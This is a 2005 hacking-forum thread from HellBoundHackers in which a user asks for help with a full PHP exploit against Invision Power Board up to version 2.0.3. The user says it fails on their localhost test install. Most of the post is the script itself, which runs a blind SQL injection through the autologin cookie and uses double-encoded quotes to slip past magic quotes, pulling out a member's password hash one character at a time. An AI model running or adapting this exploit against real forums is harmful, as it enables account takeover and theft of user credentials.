Follow us on Twitter!
Capitalism is an Island of wealth in a sea of poverty
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 18
Guests Online: 16
Members Online: 2

Registered Members: 82886
Newest Member: The Slummy
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

IPB exploit - can't get it work


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-06-05 13:04
I fould this exploit for Invision power board. It shoud work till 2.0.3 version. So, I install test forum (version 2.0.3) on my localhost but I can't get it work.
- First of all does anybody get it work??
- Second I try to use this script (Of cause I correct server and file variable), didn't work I get just 0s for result.
- Is there maybe a problem with user id (I have 2 users on my test forum, I change variable id to 1), didn't work.

Any idea?

Code
<?php
/*
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/

$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
  $idx = 0;
  $found = false;

  while( !($found) ) {
    $letter = substr($hex, $idx, 1);
 
    /* %2527 translates to %27, which gets past magic quotes.This is translated to ' by urldecode. */
    $cookie ="member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
    $cookie .="%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
 
    /* Query is in effect: SELECT * FROM ibf_members
        WHERE id=$id AND password='$pass' ORid=$target
        HAVING id=$target AND MID(`password`,$i,1)='$letter' */
 
    $header = getHeader($server, $port, $file . "index.php?act=Login&CODE=autologin", $cookie);
    if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/', $header) ) {
      echo $i . ": " . $letter . "\n";
      $found = true;
 
      $hash .= $letter;
    } else {
      $idx++;
    }
  }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
  $ip = gethostbyname($server);
  $fp = fsockopen($ip, $port);

  if (!$fp) {
      return "Unknown";
  } else {
    $com = "HEAD $file HTTP/1.1\r\n";
    $com .= "Host: $server:$port\r\n";
    $com .= "Cookie: $cookie\r\n";
    $com .= "Connection: close\r\n";
    $com .= "\r\n";

    fputs($fp, $com);

    do {
        $header.= fread($fp, 512);
    } while( !preg_match('/\r\n\r\n$/',$header) );
  }

  return $header;
}
?>




Edited by on 25-06-05 13:04